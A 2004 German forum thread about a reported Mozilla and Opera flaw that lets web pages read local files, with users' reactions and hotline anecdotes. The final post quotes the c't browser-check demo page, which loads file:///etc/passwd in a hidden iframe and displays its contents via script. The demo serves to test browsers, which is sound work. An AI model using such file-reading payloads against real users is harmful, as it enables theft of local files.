| Vorheriges Thema anzeigen :: Nächstes Thema anzeigen |
| Autor |
Nachricht |
Frank
registrierter User
Anmeldungsdatum: 31.07.2003
Beiträge: 6643
|
 (#224906) Verfasst am: 07.12.2004, 12:44 Titel: Mozilla & Co: Webseiten lesen lokale Dateien |
 |
|
Quelle: http://www.heise.de/newsticker/meldung/53964
| Heise hat folgendes geschrieben: |
Giovanni Delvecchio weist in einem Posting auf der Sicherheits-Mailingliste Full Disclosure auf ein mögliches Problem der alternativen Browser der Mozilla-Foundation und des norwegischen Software-Herstellers Opera hin: Über einen Trick können Webseiten lokale Dateien ausspionieren.
...
Delvecchio gelang es nicht, auf diesem Weg auch mit dem Internet Explorer lokale Dateien auszulesen. Warum der Microsoft-Browser gegen diesen Trick immun sein sollte, ist allerdings nicht klar.
...
Delvecchio hat die Entwickler von Mozilla und Opera unterrichtet, aber keine Antwort erhalten.
|
|
|
| Nach oben |
|
 |
Frank
registrierter User
Anmeldungsdatum: 31.07.2003
Beiträge: 6643
|
| (#224907) Verfasst am: 07.12.2004, 12:51 Titel: |
|
|
Ihr solltet mal (falls nicht schon passiert) den c't-Browsercheck testen. 
|
|
| Nach oben |
|
|
frajo
dauerhaft gesperrt
Anmeldungsdatum: 25.08.2003
Beiträge: 11440
|
| (#224946) Verfasst am: 07.12.2004, 14:08 Titel: |
|
|
| Frank hat folgendes geschrieben: | | Ihr solltet mal (falls nicht schon passiert) den c't-Browsercheck testen. |
habe ich gemacht.
erster test: fehlschlag, weil auf meiner kiste keine parttition C: existiert.
zweiter test: fehlschlag, weil auf meiner kiste kein pfad "/" existiert.
im übrigen halte ich dieses "problem" für eines der kategorie "geben sie mir doch bitte ihre kreditkartennummer".
wer dieser bitte nachkommt, kriegt in etwa das, was er verdient.
(ich hatte mal so einen kunden an der hotline: "was kann ich nur machen? jeden monat werden mir 80 DM abgebucht, nachdem ich auf einer amerikanischen porno-seite meine kreditkartennummer eingab. nein, ich habe den rest auf der seite nicht verstanden; ich kann kein englisch.")
|
|
| Nach oben |
|
|
Blaubär
Höhlenbewohner
Anmeldungsdatum: 18.07.2003
Beiträge: 1133
Wohnort: Mainufer
|
| (#224955) Verfasst am: 07.12.2004, 14:25 Titel: |
|
|
| frajo hat folgendes geschrieben: | | (ich hatte mal so einen kunden an der hotline: "was kann ich nur machen? jeden monat werden mir 80 DM abgebucht, nachdem ich auf einer amerikanischen porno-seite meine kreditkartennummer eingab. nein, ich habe den rest auf der seite nicht verstanden; ich kann kein englisch.") |
Was hast du dem denn geantwortet?
|
|
| Nach oben |
|
|
Evilbert
auf eigenen Wunsch deaktiviert
Anmeldungsdatum: 16.09.2003
Beiträge: 42408
|
| (#224959) Verfasst am: 07.12.2004, 14:35 Titel: |
|
|
| Blaubär hat folgendes geschrieben: | | frajo hat folgendes geschrieben: | | (ich hatte mal so einen kunden an der hotline: "was kann ich nur machen? jeden monat werden mir 80 DM abgebucht, nachdem ich auf einer amerikanischen porno-seite meine kreditkartennummer eingab. nein, ich habe den rest auf der seite nicht verstanden; ich kann kein englisch.") |
Was hast du dem denn geantwortet? |
Ich hätte geantwortet: "Geben sie mir die Adresse der Seite sowie ihre Kreditkartennummer, ich werde mal gucken, was ich machen kann" 
|
|
| Nach oben |
|
|
frajo
dauerhaft gesperrt
Anmeldungsdatum: 25.08.2003
Beiträge: 11440
|
| (#224962) Verfasst am: 07.12.2004, 14:40 Titel: |
|
|
| Blaubär hat folgendes geschrieben: | | frajo hat folgendes geschrieben: | | (ich hatte mal so einen kunden an der hotline: "was kann ich nur machen? jeden monat werden mir 80 DM abgebucht, nachdem ich auf einer amerikanischen porno-seite meine kreditkartennummer eingab. nein, ich habe den rest auf der seite nicht verstanden; ich kann kein englisch.") |
Was hast du dem denn geantwortet? |
ich habe ihm geraten, mit seiner bank über das problem zu sprechen.
viel zeit für längere erörterungen nahm er sich nicht; wohl wegen des minutenpreises von DM 3,60.
außerdem war es ihm hörbar peinlich.
|
|
| Nach oben |
|
|
Christian
Wieder (unregelmäßig) da!
Anmeldungsdatum: 18.07.2003
Beiträge: 221
Wohnort: Knittelfeld (Österreich)
|
| (#225480) Verfasst am: 08.12.2004, 14:08 Titel: |
|
|
Mit Debian-Linux geht bei mir standardmäßig (von Firefox 1.0 aus) der Gnome-Texteditor auf, mit folgendem Text:
| Zitat: | <HTML>
<BODY onLoad="ReadFileContent()" >
<iframe id="local_file" name="local_file"
src="file:///etc/passwd"
height=0 width=0>
</iframe>
<script>
function ReadFileContent(){
alert(local_file.document.firstChild.innerHTML);
}
</script>
<h2>c't-Browsercheck-Demo</h2>
<P>Wenn ein Fenster Ihnen den Inhalt der Datei /etc/passwd anzeigt,
hat die Demo funktioniert. Erscheint kein zusätzliches Fenster, ist
sie fehlgeschlagen. Sie können dieses Fenster jetzt schließen.</P>
</body>
</html> |
_________________
Ubi dubium, ibi libertas:
Wo der Zweifel ist, da ist die Freiheit.
Lateinisches Sprichwort
|
|
| Nach oben |
|
|
|
FAQ 
Suchen 
Mitgliederliste 
Nutzungsbedingungen 
Benutzergruppen 
Links
Registrieren
Profil 
Einloggen, um private Nachrichten zu lesen 
Login 
